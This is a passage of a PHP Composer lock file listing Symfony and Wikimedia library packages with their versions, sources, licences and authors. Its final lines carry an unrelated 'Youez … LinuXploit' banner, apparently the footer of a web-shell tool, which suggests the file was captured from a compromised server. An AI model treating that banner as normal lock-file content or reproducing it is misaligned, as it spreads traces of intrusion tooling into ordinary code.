                "php": ">=5.5.9"
            },
            "type": "library",
            "extra": {
                "branch-alias": {
                    "dev-master": "3.0-dev"
                }
            },
            "autoload": {
                "psr-4": {
                    "Symfony\\Component\\Process\\": ""
                },
                "exclude-from-classmap": [
                    "/Tests/"
                ]
            },
            "notification-url": "https://packagist.org/downloads/",
            "license": [
                "MIT"
            ],
            "authors": [
                {
                    "name": "Fabien Potencier",
                    "email": "fabien@symfony.com"
                },
                {
                    "name": "Symfony Community",
                    "homepage": "https://symfony.com/contributors"
                }
            ],
            "description": "Symfony Process Component",
            "homepage": "https://symfony.com",
            "time": "2016-03-30 10:41:14"
        },
        {
            "name": "wikimedia/assert",
            "version": "v0.2.2",
            "source": {
                "type": "git",
                "url": "https://github.com/wmde/Assert.git",
                "reference": "2da55927525975f8d52825fc3ee02e5e36f5036c"
            },
            "dist": {
                "type": "zip",
                "url": "https://api.github.com/repos/wmde/Assert/zipball/2da55927525975f8d52825fc3ee02e5e36f5036c",
                "reference": "2da55927525975f8d52825fc3ee02e5e36f5036c",
                "shasum": ""
            },
            "require-dev": {
                "phpunit/phpunit": "3.7.*"
            },
            "type": "library",
            "autoload": {
                "psr-4": {
                    "Wikimedia\\Assert\\": "src/",
                    "Wikimedia\\Assert\\Test\\": "tests/phpunit/"
                }
            },
            "notification-url": "https://packagist.org/downloads/",
            "license": [
                "MIT"
            ],
            "authors": [
                {
                    "name": "Daniel Kinzler"
                }
            ],
            "description": "Provides runtime assertions",
            "homepage": "https://github.com/wmde/Assert",
            "keywords": [
                "assert",
                "assertions",
                "php",
                "postcondition",
                "precondition",
                "qa"
            ],
            "time": "2015-04-29 17:23:50"
        },
        {
            "name": "wikimedia/avro",
            "version": "v1.7.7",
            "source": {
                "type": "git",
                "url": "https://github.com/wikimedia/avro-php.git",
                "reference": "b642da9fd895aab7cb3261a22624228115471f47"
            },
            "dist": {
                "type": "zip",
                "url": "https://api.github.com/repos/wikimedia/avro-php/zipball/b642da9fd895aab7cb3261a22624228115471f47",
                "reference": "b642da9fd895aab7cb3261a22624228115471f47",
                "shasum": ""
            },
            "require": {
                "php": ">=5.3.3"
            },
            "require-dev": {
                "jakub-onderka/php-parallel-lint": "^0.9",
                "phpunit/phpunit": "^4.0.0"
            },
            "suggest": {
                "ext-gmp": "Large integer support for 32-bit platforms."
            },
            "type": "library",
            "autoload": {
                "classmap": [
                    "lib/"
                ]
            },
            "notification-url": "https://packagist.org/downloads/",
            "license": [
                "Apache-2.0"
            ],
            "authors": [
                {
                    "name": "Michael Glaesemann",
                    "email": "grzm@seespotcode.net"
                },
                {
                    "name": "Andy Wick",
                    "email": "awick@purple.org"
                },
                {
                    "name": "Saleem Shafi",
                    "email": "saleemshafi@gmail.com"
                },
                {
                    "name": "A B",
                    "email": "abawany@x.com"
                },
                {
                    "name": "Doug Cutting",
                    "email": "cutting@apache.org"
                },
                {
                    "name": "Tom White",
                    "email": "tom@cloudera.com"
                }
            ],
            "description": "A library for using Apache Avro with PHP.",
            "homepage": "https://avro.apache.org/",
            "keywords": [
                "serialization"
            ],
            "time": "2015-09-05 18:49:27"
        },
        {
            "name": "wikimedia/base-convert",
            "version": "v1.0.1",
            "source": {
                "type": "git",
                "url": "https://github.com/wikimedia/base-convert.git",
                "reference": "2948df323875fb4ef952cda49ac03a6b39708997"
            },
            "dist": {
                "type": "zip",
                "url": "https://api.github.com/repos/wikimedia/base-convert/zipball/2948df323875fb4ef952cda49ac03a6b39708997",
                "reference": "2948df323875fb4ef952cda49ac03a6b39708997",
                "shasum": ""
            },
            "require": {
                "php": ">=5.3.3"
            },
            "require-dev": {
                "jakub-onderka/php-parallel-lint": "0.9.0",
                "mediawiki/mediawiki-codesniffer": "0.5.0",
                "phpunit/phpunit": "4.6.*"
            },
            "type": "library",
            "autoload": {
                "files": [
                    "src/Functions.php"
                ]
            },
            "notification-url": "https://packagist.org/downloads/",
            "license": [
                "GPL-2.0+"
            ],
            "authors": [
                {
                    "name": "Brion Vibber",
                    "email": "bvibber@wikimedia.org"
                },
                {
                    "name": "Tyler Romeo",
                    "email": "tylerromeo@gmail.com"
                }
            ],
            "description": "Convert an arbitrarily-long string from one numeric base to another, optionally zero-padding to a minimum column width.",
            "homepage": "https://www.mediawiki.org/wiki/base_convert",
            "time": "2015-10-29 22:19:02"
        },
        {
            "name": "wikimedia/cdb",
            "version": "1.3.0",
            "source": {
                "type": "git",
                "url": "https://github.com/wikimedia/cdb.git",
                "reference": "68f8fd495ca94ca0e965dd511e234893c515bb95"
            },
            "dist": {
                "type": "zip",
                "url": "https://api.github.com/repos/wikimedia/cdb/zipball/68f8fd495ca94ca0e965dd511e234893c515bb95",
                "reference": "68f8fd495ca94ca0e965dd511e234893c515bb95",
                "shasum": ""
            },
            "require": {
                "php": ">=5.3.2"
            },
            "require-dev": {
                "jakub-onderka/php-parallel-lint": "0.9",
                "mediawiki/mediawiki-codesniffer": "0.3.0",
                "phpunit/phpunit": "4.6.*"
            },
            "type": "library",
            "autoload": {
                "classmap": [
                    "src/"
                ]
            },
            "notification-url": "https://packagist.org/downloads/",
            "license": [
                "GPL-2.0+"
            ],
            "authors": [
                {
                    "name": "Tim Starling",
                    "email": "tstarling@wikimedia.org"
                },
                {
                    "name": "Chad Horohoe",
                    "email": "chad@wikimedia.org"
                },
                {
                    "name": "Ori Livneh",
                    "email": "ori@wikimedia.org"
                }
            ],
            "description": "Constant Database (CDB) wrapper library for PHP. Provides pure-PHP fallback when dba_* functions are absent.",
            "homepage": "https://www.mediawiki.org/wiki/CDB",
            "time": "2015-09-08 19:53:04"
        },
        {
            "name": "wikimedia/cldr-plural-rule-parser",
            "version": "v1.0.0",
            "source": {
                "type": "git",
                "url": "https://github.com/wikimedia/CLDRPluralRuleParser.git",
                "reference": "2b623a411b1a8efa4363e9fda9da496ab83a5d69"
            },
            "dist": {
                "type": "zip",
                "url": "https://api.github.com/repos/wikimedia/CLDRPluralRuleParser/zipball/2b623a411b1a8efa4363e9fda9da496ab83a5d69",
                "reference": "2b623a411b1a8efa4363e9fda9da496ab83a5d69",
                "shasum": ""
            },
            "require": {
                "php": ">=5.3.3"
            },
            "require-dev": {
                "jakub-onderka/php-parallel-lint": "^0.9.0.0",
                "mediawiki/mediawiki-codesniffer": "^0.3.0.0",
                "phpunit/phpunit": "^4.7.7.0"
            },
            "type": "library",
            "autoload": {
                "psr-4": {
                    "CLDRPluralRuleParser\\": "src/"
                }
            },
            "notification-url": "https://packagist.org/downloads/",
            "license": [
                "GPL-2.0+"
            ],
            "authors": [
                {
                    "name": "Tim Starling",
                    "email": "tstarling@wikimedia.org"
                },
                {
                    "name": "Niklas Laxström",
                    "email": "niklas.laxstrom@gmail.com"
                }
            ],
            "description": "Evaluates plural rules specified in the CLDR project notation.",
            "homepage": "https://www.mediawiki.org/wiki/CLDRPluralRuleParser",
            "time": "2015-08-28 17:03:03"
        },
        {
            "name": "wikimedia/composer-merge-plugin",
            "version": "v1.3.1",
            "source": {
                "type": "git",
                "url": "https://github.com/wikimedia/composer-merge-plugin.git",
                "reference": "0bdf8543d445ee067c9ba7d5d4a5dde70b9785f4"
            },
            "dist": {
                "type": "zip",
                "url": "https://api.github.com/repos/wikimedia/composer-merge-plugin/zipball/0bdf8543d445ee067c9ba7d5d4a5dde70b9785f4",
                "reference": "0bdf8543d445ee067c9ba7d5d4a5dde70b9785f4",
                "shasum": ""
            },
            "require": {
                "composer-plugin-api": "^1.0",
                "php": ">=5.3.2"
            },
            "require-dev": {
                "composer/composer": "1.0.*@dev",
                "jakub-onderka/php-parallel-lint": "~0.8",
                "phpunit/phpunit": "~4.8|~5.0",
                "squizlabs/php_codesniffer": "~2.1.0"
            },
            "type": "composer-plugin",
            "extra": {
                "branch-alias": {
                    "dev-master": "1.3.x-dev"
                },
                "class": "Wikimedia\\Composer\\MergePlugin"
            },
            "autoload": {
                "psr-4": {
                    "Wikimedia\\Composer\\": "src/"
                }
            },
            "notification-url": "https://packagist.org/downloads/",
            "license": [
                "MIT"
            ],
            "authors": [
                {
                    "name": "Bryan Davis",
                    "email": "bd808@wikimedia.org"
                }
            ],
            "description": "Composer plugin to merge multiple composer.json files",
            "time": "2016-03-08 17:11:37"
        },
        {
            "name": "wikimedia/html-formatter",
            "version": "1.0.1",
            "source": {
                "type": "git",
                "url": "https://github.com/wikimedia/HtmlFormatter.git",
                "reference": "60069c2fb5e4f034e7025089cc4a1023b810d197"
            },
            "dist": {
                "type": "zip",
                "url": "https://api.github.com/repos/wikimedia/HtmlFormatter/zipball/60069c2fb5e4f034e7025089cc4a1023b810d197",
                "reference": "60069c2fb5e4f034e7025089cc4a1023b810d197",
                "shasum": ""
            },
            "require": {
                "ext-mbstring": "*",
                "php": ">=5.5"
            },
            "require-dev": {
                "jakub-onderka/php-parallel-lint": "0.9.2",
                "mediawiki/mediawiki-codesniffer": "0.5.1",
                "phpunit/phpunit": "4.7.2"
            },
            "type": "library",
            "autoload": {
                "classmap": [
                    "src/"
                ]
            },
            "notification-url": "https://packagist.org/downloads/",
            "license": [
                "GPL-2.0+"
            ],
            "authors": [
                {
                    "name": "MediaWiki contributors"
                }
            ],
            "description": "Performs transformations of HTML by wrapping around libxml2 and working around its countless bugs.",
            "homepage": "https://www.mediawiki.org/wiki/HtmlFormatter",
            "time": "2016-04-07 21:25:47"
        },
        {
            "name": "wikimedia/ip-set",
            "version": "1.1.0",
            "source": {
                "type": "git",
                "url": "https://github.com/wikimedia/IPSet.git",
                "reference": "b71a3834b42e2bcb2d9fa037abbb654e82117a01"
            },
            "dist": {
                "type": "zip",
                "url": "https://api.github.com/repos/wikimedia/IPSet/zipball/b71a3834b42e2bcb2d9fa037abbb654e82117a01",
                "reference": "b71a3834b42e2bcb2d9fa037abbb654e82117a01",
                "shasum": ""
            },
            "require": {
                "php": ">=5.3.3"
            },
            "require-dev": {
                "jakub-onderka/php-parallel-lint": "0.9.2",
                "mediawiki/mediawiki-codesniffer": "0.5.1",
                "phpunit/phpunit": "4.7.2"
            },
            "type": "library",
            "autoload": {
                "classmap": [
                    "src/"
                ]
            },
            "notification-url": "https://packagist.org/downloads/",
            "license": [
                "GPL-2.0+"
            ],
            "authors": [
                {
                    "name": "Brandon Black",
                    "email": "blblack@gmail.com"
                }
            ],
            "description": "Efficiently match IP addresses against a set of CIDR specifications.",
            "homepage": "https://github.com/wikimedia/IPSet",
            "time": "2016-02-12 15:19:10"
        },
        {
            "name": "wikimedia/php-session-serializer",
            "version": "v1.0.3",
            "source": {
                "type": "git",
                "url": "https://github.com/wikimedia/php-session-serializer.git",
                "reference": "61dec9a25bdcea4a0cc34a22fe6f43efca390d55"
            },
            "dist": {
                "type": "zip",
                "url": "https://api.github.com/repos/wikimedia/php-session-serializer/zipball/61dec9a25bdcea4a0cc34a22fe6f43efca390d55",
                "reference": "61dec9a25bdcea4a0cc34a22fe6f43efca390d55",
                "shasum": ""
            },
            "require": {
                "mediawiki/at-ease": "^1.0",
                "php": ">=5.3.3",
                "psr/log": "1.0.0"
            },
            "require-dev": {
                "jakub-onderka/php-parallel-lint": "^0.9.0.0",
                "mediawiki/mediawiki-codesniffer": "0.5.0",
                "phpunit/phpunit": "~4.5"
            },
            "type": "library",
            "autoload": {
                "classmap": [
                    "src/"
                ]
            },
            "notification-url": "https://packagist.org/downloads/",
            "license": [
                "GPL-2.0+"
            ],
            "authors": [
                {
                    "name": "Brad Jorsch",
                    "email": "bjorsch@wikimedia.org"
                }
            ],
            "description": "Provides methods like PHP's session_encode and session_decode that don't mess with $_SESSION",
            "homepage": "https://www.mediawiki.org/wiki/Php-session-serializer",
            "time": "2015-11-10 22:16:03"
        },
        {
            "name": "wikimedia/relpath",
            "version": "1.0.3",
            "source": {
                "type": "git",
                "url": "https://github.com/wikimedia/RelPath.git",
                "reference": "ee38e19f3b059e5cec8863b03e35a451b8f35106"
            },
            "dist": {
                "type": "zip",
                "url": "https://api.github.com/repos/wikimedia/RelPath/zipball/ee38e19f3b059e5cec8863b03e35a451b8f35106",
                "reference": "ee38e19f3b059e5cec8863b03e35a451b8f35106",
                "shasum": ""
            },
            "require": {
                "php": ">=5.3.3"
            },
            "require-dev": {
                "jakub-onderka/php-parallel-lint": "^0.9.0.0",
                "mediawiki/mediawiki-codesniffer": "^0.4.0.0",
                "phpunit/phpunit": "^4.8.9.0"
            },
            "type": "library",
            "autoload": {
                "files": [
                    "src/RelPath.php"
                ]
            },
            "notification-url": "https://packagist.org/downloads/",
            "license": [
                "MIT"
            ],
            "authors": [
                {
                    "name": "Ori Livneh",
                    "email": "ori@wikimedia.org"
                }
            ],
            "description": "Compute a relative filepath between two paths.",
            "homepage": "https://www.mediawiki.org/wiki/RelPath",
            "time": "2015-09-29 21:17:03"
        },
        {
            "name": "wikimedia/running-stat",
            "version": "v1.1.0",
            "source": {
                "type": "git",
                "url": "https://github.com/wikimedia/RunningStat.git",
                "reference": "9d7170d3eeb6f418b9f0266b2bbe6e4681ab73dd"
            },
            "dist": {
                "type": "zip",
                "url": "https://api.github.com/repos/wikimedia/RunningStat/zipball/9d7170d3eeb6f418b9f0266b2bbe6e4681ab73dd",
                "reference": "9d7170d3eeb6f418b9f0266b2bbe6e4681ab73dd",
                "shasum": ""
            },
            "require": {
                "php": ">=5.3.3"
            },
            "require-dev": {
                "jakub-onderka/php-parallel-lint": "^0.9.0.0",
                "mediawiki/mediawiki-codesniffer": "^0.5.0.0",
                "phpunit/phpunit": "4.6.*"
            },
            "type": "library",
            "autoload": {
                "classmap": [
                    "src/"
                ]
            },
            "notification-url": "https://packagist.org/downloads/",
            "license": [
                "GPL-2.0+"
            ],
            "authors": [
                {
                    "name": "Ori Livneh",
                    "email": "ori@wikimedia.org"
                }
            ],
            "description": "PHP implementations of online statistical algorithms",
            "homepage": "https://www.mediawiki.org/wiki/RunningStat",
            "time": "2015-10-28 22:29:15"
        },
        {
            "name": "wikimedia/textcat",
            "version": "1.1.3",
            "source": {
                "type": "git",
                "url": "https://github.com/wikimedia/wikimedia-textcat.git",
                "reference": "692148be3b9e955d0323a254510f26a4c6aa5a79"
            },
            "dist": {
                "type": "zip",
                "url": "https://api.github.com/repos/wikimedia/wikimedia-textcat/zipball/692148be3b9e955d0323a254510f26a4c6aa5a79",
                "reference": "692148be3b9e955d0323a254510f26a4c6aa5a79",
                "shasum": ""
            },
            "require": {
                "php": ">=5.3.0"
            },
            "require-dev": {
                "jakub-onderka/php-parallel-lint": "0.9",
                "mediawiki/mediawiki-codesniffer": "0.5.0",
                "phpunit/phpunit": "4.6.*"
            },
            "type": "library",
            "autoload": {
                "psr-0": {
                    "TextCat": ""
                }
            },
            "notification-url": "https://packagist.org/downloads/",
            "license": [
                "LGPL-2.1"
            ],
            "authors": [
                {
                    "name": "Stanislav Malyshev",
                    "email": "smalyshev@wikimedia.org"
                }
            ],
            "description": "PHP port of the TextCat language guesser utility, see http://odur.let.rug.nl/~vannoord/TextCat/.",
            "time": "2016-03-04 20:59:24"
        },
        {
            "name": "wikimedia/utfnormal",
            "version": "v1.0.3",
            "source": {
                "type": "git",
                "url": "https://github.com/wikimedia/utfnormal.git",
                "reference": "bcb81d1d87bae400af45cc419a850dcf9883775b"
            },
            "dist": {
                "type": "zip",
                "url": "https://api.github.com/repos/wikimedia/utfnormal/zipball/bcb81d1d87bae400af45cc419a850dcf9883775b",
                "reference": "bcb81d1d87bae400af45cc419a850dcf9883775b",
                "shasum": ""
            },
            "require": {
                "php": ">=5.3.3"
            },
            "require-dev": {
                "ext-mbstring": "*",
                "jakub-onderka/php-parallel-lint": "0.8.*",
                "mediawiki/mediawiki-codesniffer": "0.1.0",
                "phpunit/phpunit": "4.6.*",
                "squizlabs/php_codesniffer": "2.2.*"
            },
            "type": "library",
            "autoload": {
                "classmap": [
                    "src/"
                ]
            },
            "notification-url": "https://packagist.org/downloads/",
            "license": [
                "GPL-2.0+"
            ],
            "authors": [
                {
                    "name": "Brion Vibber",
                    "email": "bvibber@wikimedia.org"
                }
            ],
            "description": "Contains Unicode normalization routines, including both pure PHP implementations and automatic use of the 'intl' PHP extension when present",
            "homepage": "https://www.mediawiki.org/wiki/utfnormal",
            "time": "2015-08-29 14:13:27"
        },
        {
            "name": "wikimedia/wrappedstring",
            "version": "v2.0.0",
            "source": {
                "type": "git",
                "url": "https://github.com/wikimedia/WrappedString.git",
                "reference": "1b27e0ea23bd915644dade17c3fe1e45fdbadf11"
            },
            "dist": {
                "type": "zip",
                "url": "https://api.github.com/repos/wikimedia/WrappedString/zipball/1b27e0ea23bd915644dade17c3fe1e45fdbadf11",
                "reference": "1b27e0ea23bd915644dade17c3fe1e45fdbadf11",
                "shasum": ""
            },
            "require": {
                "php": ">=5.3.3"
            },
            "require-dev": {
                "jakub-onderka/php-parallel-lint": "^0.9.0.0",
                "mediawiki/mediawiki-codesniffer": "^0.3.0.0",
                "phpunit/phpunit": "^4.7.7.0"
            },
            "type": "library",
            "autoload": {
                "psr-4": {
                    "WrappedString\\": "src/"
                }
            },
            "notification-url": "https://packagist.org/downloads/",
            "license": [
                "MIT"
            ],
            "authors": [
                {
                    "name": "Timo Tijhof",
                    "email": "krinklemail@gmail.com"
                }
            ],
            "description": "Automatically compact sequentially-outputted strings that share a common prefix / suffix pair.",
            "homepage": "https://www.mediawiki.org/wiki/WrappedString",
            "time": "2015-07-31 00:06:22"
        },
        {
            "name": "zordius/lightncandy",
            "version": "v0.23",
            "source": {
                "type": "git",
                "url": "https://github.com/zordius/lightncandy.git",
                "reference": "5753dec40ddaf8b5c70a1837bf0ff4d8e8647506"
            },
            "dist": {
                "type": "zip",
                "url": "https://api.github.com/repos/zordius/lightncandy/zipball/5753dec40ddaf8b5c70a1837bf0ff4d8e8647506",
                "reference": "5753dec40ddaf8b5c70a1837bf0ff4d8e8647506",
                "shasum": ""
            },
            "require": {
                "php": ">=5.3.0"
            },
            "require-dev": {
                "phpunit/phpunit": "4.0.17"
            },
            "type": "library",
            "autoload": {
                "classmap": [
                    "src/lightncandy.php"
                ]
            },
            "notification-url": "https://packagist.org/downloads/",
            "license": [
                "MIT"
            ],
            "authors": [
                {
                    "name": "Zordius Chen",
                    "email": "zordius@yahoo-inc.com"
                }
            ],
            "description": "An extremely fast PHP implementation of handlebars ( http://handlebarsjs.com/ ) and mustache ( http://mustache.github.io/ ).",
            "homepage": "https://github.com/zordius/lightncandy",
            "keywords": [
                "handlebars",
                "logicless",
                "mustache",
                "php",
                "template"
            ],
            "time": "2015-11-05 07:14:57"
        }
    ],
    "packages-dev": [],
    "aliases": [],
    "minimum-stability": "stable",
    "stability-flags": [],
    "prefer-stable": true,
    "prefer-lowest": false,
    "platform": {
        "php": ">=5.5.9"
    },
    "platform-dev": []
}

Youez - 2016 - github.com/yon3zu
LinuXploit